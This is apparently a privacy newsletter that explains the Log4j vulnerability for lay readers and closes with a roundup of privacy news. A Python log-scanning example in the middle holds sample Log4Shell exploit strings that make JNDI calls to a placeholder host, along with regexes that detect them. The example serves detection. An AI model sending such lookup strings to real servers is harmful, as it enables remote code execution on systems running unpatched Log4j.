As TIME reported, top U.S. cybersecurity defense official Jen Easterly deemed the flaw “one of the most serious I’ve seen in my entire career, if not the most serious,” in a call with authorities. “Publicly disclosed last Thursday, it’s catnip for cybercriminals and digital spies because it allows easy, password-free entry.”
Okay, but what does that all mean? I wanted to find out. Partly because I was interested and partly because I can't stand feeling like I'm not tech-savvy enough to be part of the conversation. So I asked Osano's CTO, Scott Hertel, to explain it to me like he was explaining it to his kids. Here's what I found out based on that conversation and recent media reports.
What is Log4j?
In industry speak, Log4j is an open-source logging tool. If that means nothing to you: Same. So I asked around. What it means in layman’s terms is that Log4j is a tool web developers use to get reports, in text files, of what’s happening with their code. It’s the most widely used tool for “debugging,” or fixing, issues that show up in the code developers are writing.
Think about Log4j reports as journal entries for web developers. Sometimes, the logs are just recording entries. Sometimes, those logs tell you there are red flags in that journal entry.
Often, Log4j is the roadmap to where the problems exist.
Why did Log4j make news this week?
Okay, so every developer basically uses Log4j. On Dec. 10, New Zealand’s cyber-security incident reporting site reported that the Log4j vulnerability was being exploited. “Reports from online users show that this is being actively exploited in the wild and that proof-of-concept code has been published.”
What the heck does that mean? Log4j had been hacked. And unless web developers using Log4j updated their software to the “patched” version – that means “fixed,” in developer speak – their systems were at risk: malicious actors could gain external control of a computer system. As Osano Chief Technology Officer Scott Hertel explained to me, the Log4j vulnerability was like “lowering the drawbridge to the castle.” Hackers who wanted to exploit the vulnerability could get inside if they acted quickly, before organizations applied the appropriate “patches.”
“To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code,” WIRED reported. “From there they can load arbitrary code on the targeted server and install malware or launch other attacks.”
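The “strategically crafted string” WIRED mentions is a Log4j lookup, written as `${...}`, and the dangerous one is the JNDI lookup. The detection script below is an added example, not code from this newsletter, Osano, or the Log4j project: it scans a few constructed web-server log lines for that pattern, undoing URL-encoding first so that encoded copies are not missed. The log lines, addresses and `example.invalid` hostnames are all made up for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real system).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

# Log4j 2 evaluates "${...}" lookups inside logged messages. The JNDI lookup is the
# one CVE-2021-44228 abuses, so it gets its own verdict; other lookups are worth a look too.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def normalize(text: str) -> str:
    """Undo up to two layers of URL-encoding so encoded lookups become visible."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_line(line: str) -> str:
    """Return 'jndi' for a JNDI lookup, 'lookup' for any other ${...}, else 'clean'."""
    text = normalize(line)
    if JNDI_LOOKUP.search(text):
        return "jndi"
    if ANY_LOOKUP.search(text):
        return "lookup"
    return "clean"


def scan(lines):
    """Return (line_number, verdict) for every line that is not clean."""
    results = []
    for number, line in enumerate(lines, 1):
        verdict = classify_line(line)
        if verdict != "clean":
            results.append((number, verdict))
    return results


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {verdict}")
```

A hit on a real log is a reason to check whether the receiving application logs that field through an unpatched Log4j, not proof of compromise by itself.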
Here’s why it’s still a bit scary
It’s hard to know how many sites were affected by the Log4j vulnerability. It’s such a pervasive tool that chances are any given developer might be running Log4j without knowing it’s within their infrastructure.
The repercussions are still to be seen.
As WIRED reported, “What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” said independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”
Security experts say the best thing to do is patch the vulnerability. If you have “an internet-facing server” that’s vulnerable to the Log4j flaw, “you almost certainly have an incident response on your hands.”
So make sure your company investigates where it might be using Log4j, and get patching! In the meantime, here's the week's big news. Happy holidays!
This week's top privacy news
Log4j, the vulnerability that panicked an entire industry this week
Security professionals say it's one of the worst computer vulnerabilities they've ever seen, the AP reports. The Department of Homeland Security told federal agencies to immediately fix the security bug because "it's so easily exploitable." The utility, Log4j, is one of the most widely used developer tools, and the vulnerability allows hackers to "easily seize control of everything from industrial control systems to web servers and consumer electronics."
Apple privacy changes incite Polish regulatory investigation
Apple is facing an investigation in Poland over whether its new rules on privacy and personal data processing for iOS devices violate competition law, Reuters reports. Following Apple’s update to its operating system, users can now opt out of being tracked by digital advertisers. But the Polish anti-monopoly regulator said the update hurt third-party apps by limiting their abilities to obtain personal data to send ads. The Polish regulator is concerned Apple’s actions may be a “case of exclusionary abuse of market power.”
Norway fines Grindr $7M for violating the GDPR
Norway’s privacy authority has fined dating app Grindr 64 million kroner ($7.6 million) for sending sensitive personal data to hundreds of potential advertising partners without user consent, the New York Post reports. It’s the Norwegian Data Protection Authority’s highest fine to date. Grindr said the ruling, which alleges the company violated the EU’s GDPR, is based on consent policies from years back, not its current practices. It will appeal the fine.
FTC may consider rule to limit commercial surveillance
The U.S. Federal Trade Commission is considering creating a rule aimed at digital platforms that track their users or allow others to do so. The FTC submitted the “Trade Regulation Rule on Commercial Surveillance” to the Office of Management and Budget on its potential upcoming regulatory actions, TechCrunch reports. The rule would “curb lax security practices, limit privacy abuses and ensure that algorithmic decision-making does not result in unlawful discrimination,” the report states.
How to prepare for the CPRA: California’s incoming privacy law
The California Privacy Rights Act (CPRA) of 2020 will replace the California Consumer Privacy Act (CCPA) of 2018. Many organizations will need to make some adjustments to data processing and sharing based on the new requirements. In this webinar, learn from Hogan Lovells’ Julian Flamant, Hintze Law’s Jevan Hutson and Osano’s Catherine Dawson about the changes to come on Jan. 1, 2023, and why you need to make changes much sooner than that.
French data protection authority demands Clearview stop collecting faces
The French data protection authority (CNIL) has ordered Clearview AI, a facial recognition company, to stop amassing and using data from French people, Reuters reports. This week, the CNIL made a “formal demand” and said the company’s collection of publicly available facial images on social media and the internet had no legal basis and therefore breached the EU GDPR. Clearview AI denies it breached the law, saying it doesn’t have any customers in France or the EU.